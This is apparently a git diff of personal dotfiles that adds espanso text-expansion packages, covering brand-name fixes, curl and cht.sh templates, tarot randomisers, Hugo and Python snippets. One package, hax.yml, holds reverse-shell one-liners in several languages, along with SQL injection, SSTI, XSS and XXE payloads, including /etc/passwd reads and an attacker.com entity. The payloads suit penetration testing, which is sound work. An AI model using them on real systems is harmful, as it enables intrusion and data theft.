|
||||||
|
- trigger: "rackspace"
|
||||||
|
replace: "Rackspace"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "rapidweaver"
|
||||||
|
replace: "RapidWeaver"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "reva"
|
||||||
|
replace: "Reva"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "salesforce"
|
||||||
|
replace: "Salesforce"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "sanebox"
|
||||||
|
replace: "SaneBox"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "smartlink"
|
||||||
|
replace: "SmartLink"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "smartsearch"
|
||||||
|
replace: "SmartSearch"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "snapchat"
|
||||||
|
replace: "Snapchat"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "ssnif"
|
||||||
|
replace: "SSNiF"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "testrail"
|
||||||
|
replace: "TestRail"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "touchbar"
|
||||||
|
replace: "Touch Bar"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "transferwise"
|
||||||
|
replace: "TransferWise"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "wikipedia"
|
||||||
|
replace: "Wikipedia"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "wordpress"
|
||||||
|
replace: "WordPress"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "wufoo"
|
||||||
|
replace: "Wufoo"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "xing"
|
||||||
|
replace: "XING"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
18
espanso/.config/espanso/match/packages/cht.yml
Normal file
18
espanso/.config/espanso/match/packages/cht.yml
Normal file
|
|
@ -0,0 +1,18 @@
|
||||||
|
# cht package
|
||||||
|
|
||||||
|
matches:
|
||||||
|
- regex: ":cht/(?P<command>.*)/"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: 'curl "https://cht.sh/{{command}}?QT&style=bw"'
|
||||||
|
|
||||||
|
- regex: ":vcht/(?P<command>.*)/"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: 'curl "https://cht.sh/{{command}}?qT&style=bw"'
|
||||||
|
|
@ -0,0 +1,63 @@
|
||||||
|
matches:
|
||||||
|
- trigger: ":vec:" # e.g.: x⃗
|
||||||
|
replace: "\u20d7"
|
||||||
|
|
||||||
|
- triggers: [":underrightarrow:", ":ura:"] # e.g.: x⃯
|
||||||
|
replace: "\u20ef"
|
||||||
|
|
||||||
|
- triggers: [":underleftarrow:", ":ula:"] # e.g.: x⃮
|
||||||
|
replace: "\u20ee"
|
||||||
|
|
||||||
|
- triggers: [":overleftarrow:", ":ola:"] # e.g.: x⃡
|
||||||
|
replace: "\u20e1"
|
||||||
|
|
||||||
|
- triggers: [":underline:", ":ul:"] # e.g.: x̲
|
||||||
|
replace: "\u0332"
|
||||||
|
|
||||||
|
- trigger: ":bar:" # e.g.: x̅
|
||||||
|
replace: "\u0305"
|
||||||
|
|
||||||
|
- trigger: ":acute:" # e.g.: x́
|
||||||
|
replace: "\u0301"
|
||||||
|
|
||||||
|
- trigger: ":macron:" # e.g.: x̄
|
||||||
|
replace: "\u0304"
|
||||||
|
|
||||||
|
- trigger: ":breve:" # e.g.: x̆
|
||||||
|
replace: "\u0306"
|
||||||
|
|
||||||
|
- trigger: ":caron:" # e.g.: x̌
|
||||||
|
replace: "\u030c"
|
||||||
|
|
||||||
|
- trigger: ":ddddot:" # e.g.: x⃛
|
||||||
|
replace: "\u20dc"
|
||||||
|
|
||||||
|
- trigger: ":dddot:" # e.g.: x⃛
|
||||||
|
replace: "\u20db"
|
||||||
|
|
||||||
|
- trigger: ":ddot:" # e.g.: ẍ
|
||||||
|
replace: "\u0308"
|
||||||
|
|
||||||
|
- trigger: ":dot:" # e.g.: ẋ
|
||||||
|
replace: "\u0307"
|
||||||
|
|
||||||
|
- trigger: ":grave:" # e.g.: x̀
|
||||||
|
replace: "\u0300"
|
||||||
|
|
||||||
|
- trigger: ":hat:" # e.g.: x̂
|
||||||
|
replace: "\u0302"
|
||||||
|
|
||||||
|
- trigger: ":widehat:" # e.g.: x̂
|
||||||
|
replace: "\u0302"
|
||||||
|
|
||||||
|
- trigger: ":tilde:" # e.g.: x̃
|
||||||
|
replace: "\u0303"
|
||||||
|
|
||||||
|
- trigger: ":widetilde:" # e.g.: x̃
|
||||||
|
replace: "\u0303"
|
||||||
|
|
||||||
|
- trigger: ":ring:" # e.g.: x̊
|
||||||
|
replace: "\u030a"
|
||||||
|
|
||||||
|
- triggers: [":not:", ":slash:"] # e.g.: x̸
|
||||||
|
replace: "\u0338"
|
||||||
64
espanso/.config/espanso/match/packages/curl.yml
Normal file
64
espanso/.config/espanso/match/packages/curl.yml
Normal file
|
|
@ -0,0 +1,64 @@
|
||||||
|
# curl package
|
||||||
|
|
||||||
|
name: curl
|
||||||
|
parent: default
|
||||||
|
|
||||||
|
global_vars:
|
||||||
|
- name: curlform
|
||||||
|
type: form
|
||||||
|
params:
|
||||||
|
layout: Target [[protocol]]://[[URL]]
|
||||||
|
fields:
|
||||||
|
protocol:
|
||||||
|
type: choice
|
||||||
|
values: [https, http]
|
||||||
|
default: https
|
||||||
|
|
||||||
|
matches:
|
||||||
|
- trigger: ":curl:"
|
||||||
|
replace: "curl --request GET {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlget:"
|
||||||
|
replace: "curl --request GET {{curlform.protocol}}://{{curlform.URL}}?key=value"
|
||||||
|
|
||||||
|
- trigger: ":curlpost:"
|
||||||
|
replace: "curl --request POST {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlput:"
|
||||||
|
replace: "curl --request PUT {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curldelete:"
|
||||||
|
replace: "curl --request DELETE {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlpatch:"
|
||||||
|
replace: "curl --request PATCH {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curldata:"
|
||||||
|
replace: "curl --request POST --header 'Content-Type: multipart/form-data' --form 'key=value' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlxml:"
|
||||||
|
replace: "curl --request POST --header 'Content-Type: application/xml' --data '<key>value</key>' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curljson:"
|
||||||
|
replace: 'curl --request POST --header ''Content-Type: application/json'' --data ''{"key":"value"}'' {{curlform.protocol}}://{{curlform.URL}}'
|
||||||
|
|
||||||
|
- trigger: ":curlheader:"
|
||||||
|
replace: "curl --request GET --header 'X-My-Header: 123' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlcookie:"
|
||||||
|
replace: "curl --request GET --cookie 'key=value' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlbasic:"
|
||||||
|
replace: "curl --request GET --user 'username:password' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlbearer:"
|
||||||
|
replace: "curl --request GET --header 'Authorization: Bearer token' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlproxy:"
|
||||||
|
replace: "curl --request GET --proxy http://proxy.example.com:8080 {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curldownload:"
|
||||||
|
replace: "curl --request GET --output file.txt {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlupload:"
|
||||||
|
replace: "curl --request POST --form 'file=@/path/to/file' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
300
espanso/.config/espanso/match/packages/divination-oracles.yml
Normal file
300
espanso/.config/espanso/match/packages/divination-oracles.yml
Normal file
|
|
@ -0,0 +1,300 @@
|
||||||
|
# Returns a random playing card from a standard 52 card deck, with no jokers
|
||||||
|
matches:
|
||||||
|
- trigger: ":card:"
|
||||||
|
replace: "{{number}} of {{suit}}"
|
||||||
|
vars:
|
||||||
|
- name: number
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Ace"
|
||||||
|
- "2"
|
||||||
|
- "3"
|
||||||
|
- "4"
|
||||||
|
- "5"
|
||||||
|
- "6"
|
||||||
|
- "7"
|
||||||
|
- "8"
|
||||||
|
- "9"
|
||||||
|
- "10"
|
||||||
|
- "Jack"
|
||||||
|
- "Queen"
|
||||||
|
- "King"
|
||||||
|
- name: suit
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Hearts"
|
||||||
|
- "Clubs"
|
||||||
|
- "Diamonds"
|
||||||
|
- "Spades"
|
||||||
|
|
||||||
|
# Returns a random playing card from a 54 card deck, including 2 jokers
|
||||||
|
- trigger: ":cardj:"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Ace of Hearts"
|
||||||
|
- "2 of Hearts"
|
||||||
|
- "3 of Hearts"
|
||||||
|
- "4 of Hearts"
|
||||||
|
- "5 of Hearts"
|
||||||
|
- "6 of Hearts"
|
||||||
|
- "7 of Hearts"
|
||||||
|
- "8 of Hearts"
|
||||||
|
- "9 of Hearts"
|
||||||
|
- "10 of Hearts"
|
||||||
|
- "Jack of Hearts"
|
||||||
|
- "Queen of Hearts"
|
||||||
|
- "King of Hearts"
|
||||||
|
- "Ace of Clubs"
|
||||||
|
- "2 of Clubs"
|
||||||
|
- "3 of Clubs"
|
||||||
|
- "4 of Clubs"
|
||||||
|
- "5 of Clubs"
|
||||||
|
- "6 of Clubs"
|
||||||
|
- "7 of Clubs"
|
||||||
|
- "8 of Clubs"
|
||||||
|
- "9 of Clubs"
|
||||||
|
- "10 of Clubs"
|
||||||
|
- "Jack of Clubs"
|
||||||
|
- "Queen of Clubs"
|
||||||
|
- "King of Clubs"
|
||||||
|
- "Ace of Diamonds"
|
||||||
|
- "2 of Diamonds"
|
||||||
|
- "3 of Diamonds"
|
||||||
|
- "4 of Diamonds"
|
||||||
|
- "5 of Diamonds"
|
||||||
|
- "6 of Diamonds"
|
||||||
|
- "7 of Diamonds"
|
||||||
|
- "8 of Diamonds"
|
||||||
|
- "9 of Diamonds"
|
||||||
|
- "10 of Diamonds"
|
||||||
|
- "Jack of Diamonds"
|
||||||
|
- "Queen of Diamonds"
|
||||||
|
- "King of Diamonds"
|
||||||
|
- "Ace of Spades"
|
||||||
|
- "2 of Spades"
|
||||||
|
- "3 of Spades"
|
||||||
|
- "4 of Spades"
|
||||||
|
- "5 of Spades"
|
||||||
|
- "6 of Spades"
|
||||||
|
- "7 of Spades"
|
||||||
|
- "8 of Spades"
|
||||||
|
- "9 of Spades"
|
||||||
|
- "10 of Spades"
|
||||||
|
- "Jack of Spades"
|
||||||
|
- "Queen of Spades"
|
||||||
|
- "King of Spades"
|
||||||
|
- "Joker"
|
||||||
|
- "Joker"
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck
|
||||||
|
- trigger: ":tarot:"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "The Fool (0)"
|
||||||
|
- "The Magician (1)"
|
||||||
|
- "The High Priestess (2)"
|
||||||
|
- "The Empress (3)"
|
||||||
|
- "The Emperor (4)"
|
||||||
|
- "The Hierophant (5)"
|
||||||
|
- "The Lovers (6)"
|
||||||
|
- "The Chariot (7)"
|
||||||
|
- "Strength (8)"
|
||||||
|
- "The Hermit (9)"
|
||||||
|
- "Wheel of Fortune (10)"
|
||||||
|
- "Justice (11)"
|
||||||
|
- "The Hanged Man (12)"
|
||||||
|
- "Death (13)"
|
||||||
|
- "Temperance (14)"
|
||||||
|
- "The Devil (15)"
|
||||||
|
- "The Tower (16)"
|
||||||
|
- "The Star (17)"
|
||||||
|
- "The Moon (18)"
|
||||||
|
- "The Sun (19)"
|
||||||
|
- "Judgment (20)"
|
||||||
|
- "The World (21)"
|
||||||
|
- "Ace of Wands"
|
||||||
|
- "2 of Wands"
|
||||||
|
- "3 of Wands"
|
||||||
|
- "4 of Wands"
|
||||||
|
- "5 of Wands"
|
||||||
|
- "6 of Wands"
|
||||||
|
- "7 of Wands"
|
||||||
|
- "8 of Wands"
|
||||||
|
- "9 of Wands"
|
||||||
|
- "10 of Wands"
|
||||||
|
- "Page of Wands"
|
||||||
|
- "Knight of Wands"
|
||||||
|
- "Queen of Wands"
|
||||||
|
- "King of Wands"
|
||||||
|
- "Ace of Cups"
|
||||||
|
- "2 of Cups"
|
||||||
|
- "3 of Cups"
|
||||||
|
- "4 of Cups"
|
||||||
|
- "5 of Cups"
|
||||||
|
- "6 of Cups"
|
||||||
|
- "7 of Cups"
|
||||||
|
- "8 of Cups"
|
||||||
|
- "9 of Cups"
|
||||||
|
- "10 of Cups"
|
||||||
|
- "Page of Cups"
|
||||||
|
- "Knight of Cups"
|
||||||
|
- "Queen of Cups"
|
||||||
|
- "King of Cups"
|
||||||
|
- "Ace of Swords"
|
||||||
|
- "2 of Swords"
|
||||||
|
- "3 of Swords"
|
||||||
|
- "4 of Swords"
|
||||||
|
- "5 of Swords"
|
||||||
|
- "6 of Swords"
|
||||||
|
- "7 of Swords"
|
||||||
|
- "8 of Swords"
|
||||||
|
- "9 of Swords"
|
||||||
|
- "10 of Swords"
|
||||||
|
- "Page of Swords"
|
||||||
|
- "Knight of Swords"
|
||||||
|
- "Queen of Swords"
|
||||||
|
- "King of Swords"
|
||||||
|
- "Ace of Pentacles"
|
||||||
|
- "2 of Pentacles"
|
||||||
|
- "3 of Pentacles"
|
||||||
|
- "4 of Pentacles"
|
||||||
|
- "5 of Pentacles"
|
||||||
|
- "6 of Pentacles"
|
||||||
|
- "7 of Pentacles"
|
||||||
|
- "8 of Pentacles"
|
||||||
|
- "9 of Pentacles"
|
||||||
|
- "10 of Pentacles"
|
||||||
|
- "Page of Pentacles"
|
||||||
|
- "Knight of Pentacles"
|
||||||
|
- "Queen of Pentacles"
|
||||||
|
- "King of Pentacles"
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 25% chance of it being reversed
|
||||||
|
- trigger: ":tarot25:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 20% chance of it being reversed
|
||||||
|
- trigger: ":tarot20:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 10% chance of it being reversed
|
||||||
|
- trigger: ":tarot10:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 5% chance of it being reversed
|
||||||
|
- trigger: ":tarot5:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a 36-card Lenormand deck
|
||||||
|
- trigger: ":lenormand:"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Rider (1)"
|
||||||
|
- "Clover (2)"
|
||||||
|
- "Ship (3)"
|
||||||
|
- "House (4)"
|
||||||
|
- "Tree (5)"
|
||||||
|
- "Clouds (6)"
|
||||||
|
- "Snake (7)"
|
||||||
|
- "Coffin (8)"
|
||||||
|
- "Bouquet (9)"
|
||||||
|
- "Scythe (10)"
|
||||||
|
- "Whip (11)"
|
||||||
|
- "Birds (12)"
|
||||||
|
- "Child (13)"
|
||||||
|
- "Fox (14)"
|
||||||
|
- "Bear (15)"
|
||||||
|
- "Stars (16)"
|
||||||
|
- "Stork (17)"
|
||||||
|
- "Dog (18)"
|
||||||
|
- "Tower (19)"
|
||||||
|
- "Garden (20)"
|
||||||
58
espanso/.config/espanso/match/packages/hax.yml
Normal file
58
espanso/.config/espanso/match/packages/hax.yml
Normal file
|
|
@ -0,0 +1,58 @@
|
||||||
|
matches:
|
||||||
|
# Reverse Shells
|
||||||
|
- trigger: ":rev-perl"
|
||||||
|
replace: "perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
|
||||||
|
- trigger: ":rev-python"
|
||||||
|
replace: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
|
||||||
|
- trigger: ":rev-php"
|
||||||
|
replace: "php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
|
||||||
|
- trigger: ":rev-ruby"
|
||||||
|
replace: "ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
|
||||||
|
- trigger: ":rev-nc"
|
||||||
|
replace: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"
|
||||||
|
|
||||||
|
# SQL Injection Payloads
|
||||||
|
- trigger: ":sqli-poly"
|
||||||
|
replace: "SLEEP(1) /*' or SLEEP(1) or '\" or SLEEP(1) or \"*/"
|
||||||
|
|
||||||
|
# Server-side Template Injection Payloads
|
||||||
|
- trigger: ":ssti-asp"
|
||||||
|
replace: "@(1+2)"
|
||||||
|
- trigger: ":ssti-el"
|
||||||
|
replace: "${1+1}"
|
||||||
|
- trigger: ":ssti-el-alt"
|
||||||
|
replace: "#{1+1}"
|
||||||
|
- trigger: ":ssti-groovy"
|
||||||
|
replace: "${\"http://www.google.com\".toURL().text}"
|
||||||
|
- trigger: ":ssti-groovy-alt"
|
||||||
|
replace: "${new URL(\"http://www.google.com\").getText()}"
|
||||||
|
- trigger: ":ssti-jinja"
|
||||||
|
replace: "{{4*4}}[[5*5]]"
|
||||||
|
- trigger: ":ssti-ruby-file"
|
||||||
|
replace: "<%= File.open('/etc/passwd').read %>"
|
||||||
|
- trigger: ":ssti-ruby-dir"
|
||||||
|
replace: "<%= Dir.entries('/') %>"
|
||||||
|
- trigger: ":ssti-smarty"
|
||||||
|
replace: "{$smarty.version}"
|
||||||
|
- trigger: ":ssti-twig"
|
||||||
|
replace: "{{dump(app)}}"
|
||||||
|
- trigger: ":ssti-velocity"
|
||||||
|
replace: "#set($str=$class.inspect(\"java.lang.String\").type)"
|
||||||
|
|
||||||
|
# Cross-site Scripting Payloads
|
||||||
|
- trigger: ":xss-basic"
|
||||||
|
replace: "<script>confirm`1`</script>"
|
||||||
|
- trigger: ":xss-img"
|
||||||
|
replace: "<img src=a onerror=confirm`1`/>"
|
||||||
|
- trigger: ":xss-dom"
|
||||||
|
replace: "#\"><img src=/ onerror=alert(1)>"
|
||||||
|
- trigger: ":xss-markdown"
|
||||||
|
replace: "[a](javascript:prompt(1))"
|
||||||
|
- trigger: ":xss-poly"
|
||||||
|
replace: "\" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//"
|
||||||
|
|
||||||
|
# External XML Entity Injection Payloads
|
||||||
|
- trigger: ":xxe-file"
|
||||||
|
replace: "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>"
|
||||||
|
- trigger: ":xxe-http"
|
||||||
|
replace: "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'http://attacker.com'>]><root>&test;</root>"
|
||||||
45
espanso/.config/espanso/match/packages/hugo-shortcodes.yml
Normal file
45
espanso/.config/espanso/match/packages/hugo-shortcodes.yml
Normal file
|
|
@ -0,0 +1,45 @@
|
||||||
|
# 2022-03-12T12:00:49+0000
|
||||||
|
# salopst
|
||||||
|
#
|
||||||
|
# Some Espanso triggers for Hugo Shortcodes
|
||||||
|
# https://gohugo.io/content-management/shortcodes/
|
||||||
|
|
||||||
|
|
||||||
|
matches:
|
||||||
|
- trigger: ":hf"
|
||||||
|
replace: "{{< figure src=\"$|$\" title=\"FIGURE_TITLE\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":hg"
|
||||||
|
replace: "{{< gist GIT_USER_NAME GIST_ID >}}"
|
||||||
|
|
||||||
|
- trigger: ":hil"
|
||||||
|
replace: |-
|
||||||
|
{{< highlight $|$SYNTAX_LANG >}}
|
||||||
|
|
||||||
|
{{< /highlight >}}
|
||||||
|
|
||||||
|
- trigger: ":hin"
|
||||||
|
replace: "{{< instagram $|$INSTAGRAM_ID hidecaption >}}"
|
||||||
|
|
||||||
|
- trigger: ":hp"
|
||||||
|
replace: "{{< param $|$PARAMETER_NAME >}}"
|
||||||
|
|
||||||
|
# generates absolute href
|
||||||
|
- trigger: ":href"
|
||||||
|
replace: "{{< ref \"$|$ANCHOR_TARGET\" >}}"
|
||||||
|
|
||||||
|
# generates relative href
|
||||||
|
- trigger: ":hrel"
|
||||||
|
replace: "{{< relref \"$|$ANCHOR_TARGET\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":ht"
|
||||||
|
replace: "{{< tweet user=\"$|$\" id=\"TWEET_ID\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":hv"
|
||||||
|
replace: "{{< vimeo $|$VIMEO_ID >}}"
|
||||||
|
|
||||||
|
- trigger: ":hy"
|
||||||
|
replace: "{{< youtube id=\"$|$YOUTUBE_ID\" title=\"VIDEO_TITLE\" autoplay=\"TRUE_|_FALSE\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":him"
|
||||||
|
replace: "{{< image src=\"/uploads/$|$IMAGE_FILE_NAME\" alt=\"ALT_TEXT\" position=\"center\" style=\"border-radius: 30px;\" >}}"
|
||||||
19
espanso/.config/espanso/match/packages/lower-upper.yml
Normal file
19
espanso/.config/espanso/match/packages/lower-upper.yml
Normal file
|
|
@ -0,0 +1,19 @@
|
||||||
|
matches:
|
||||||
|
- trigger: "::low"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: "clipboard"
|
||||||
|
type: "clipboard"
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: "echo \"$ESPANSO_CLIPBOARD\" | tr '[:upper:]' '[:lower:]'"
|
||||||
|
- trigger: "::up"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: "clipboard"
|
||||||
|
type: "clipboard"
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: "echo \"$ESPANSO_CLIPBOARD\" | tr '[:lower:]' '[:upper:]'"
|
||||||
|
|
@ -0,0 +1,38 @@
|
||||||
|
matches:
|
||||||
|
# æøå
|
||||||
|
- trigger: ":ae"
|
||||||
|
label: "æÆ"
|
||||||
|
replace: "æ"
|
||||||
|
propagate_case: true
|
||||||
|
- trigger: ":oe"
|
||||||
|
label: "øØ"
|
||||||
|
replace: "ø"
|
||||||
|
propagate_case: true
|
||||||
|
- trigger: ":aa"
|
||||||
|
label: "åÅ"
|
||||||
|
replace: "å"
|
||||||
|
propagate_case: true
|
||||||
|
|
||||||
|
# acute accents
|
||||||
|
- trigger: ":e'"
|
||||||
|
label: "éÉ (e acute)"
|
||||||
|
replace: "é"
|
||||||
|
propagate_case: true
|
||||||
|
|
||||||
|
# grave accents
|
||||||
|
- trigger: ":a`"
|
||||||
|
label: "àÀ (a grave)"
|
||||||
|
replace: "à"
|
||||||
|
propagate_case: true
|
||||||
|
- trigger: ":o`"
|
||||||
|
label: "òÒ (o grave)"
|
||||||
|
replace: "ò"
|
||||||
|
propagate_case: true
|
||||||
|
|
||||||
|
# Norwegian quote marks
|
||||||
|
- trigger: ":`"
|
||||||
|
label: "« (open quote)"
|
||||||
|
replace: "«"
|
||||||
|
- trigger: ":'"
|
||||||
|
label: "» (close quote)"
|
||||||
|
replace: "»"
|
||||||
60
espanso/.config/espanso/match/packages/python-utils.yml
Normal file
60
espanso/.config/espanso/match/packages/python-utils.yml
Normal file
|
|
@ -0,0 +1,60 @@
|
||||||
|
matches:
|
||||||
|
- trigger: ":pymain"
|
||||||
|
replace: |
|
||||||
|
def main() -> None:
|
||||||
|
$|$
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
|
- trigger: ":pycls"
|
||||||
|
replace: |
|
||||||
|
class $|$:
|
||||||
|
def __init__(self) -> None:
|
||||||
|
|
||||||
|
|
||||||
|
def method_1(self) -> None:
|
||||||
|
|
||||||
|
- trigger: ":pydef"
|
||||||
|
replace: |
|
||||||
|
def $|$():
|
||||||
|
|
||||||
|
return
|
||||||
|
- trigger: ":pymatch"
|
||||||
|
replace: |
|
||||||
|
match $|$:
|
||||||
|
case :
|
||||||
|
|
||||||
|
case _:
|
||||||
|
|
||||||
|
- trigger: ":pytry"
|
||||||
|
replace: |
|
||||||
|
try:
|
||||||
|
|
||||||
|
except $|$ as e:
|
||||||
|
|
||||||
|
- trigger: ":pyboiler:args"
|
||||||
|
replace: |
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
def main(args: argparse.Namespace) -> None:
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
|
||||||
|
parser.add_argument("$|$")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
main(args)
|
||||||
|
- trigger: ":pyboiler:log"
|
||||||
|
replace: |
|
||||||
|
import logging
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
def main() -> None:
|
||||||
|
logger.debug("Logger working")
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
logging.basicConfig(level=logging.DEBUG, format="%(levelname)s %(asctime)s: %(message)s")
|
||||||
|
|
||||||
|
main()
|
||||||
52
ghostty/.config/ghostty/bloom.glsl
Normal file
52
ghostty/.config/ghostty/bloom.glsl
Normal file
|
|
@ -0,0 +1,52 @@
|
||||||
|
// source: https://gist.github.com/qwerasd205/c3da6c610c8ffe17d6d2d3cc7068f17f
|
||||||
|
// credits: https://github.com/qwerasd205
|
||||||
|
// Golden spiral samples, [x, y, weight] weight is inverse of distance.
|
||||||
|
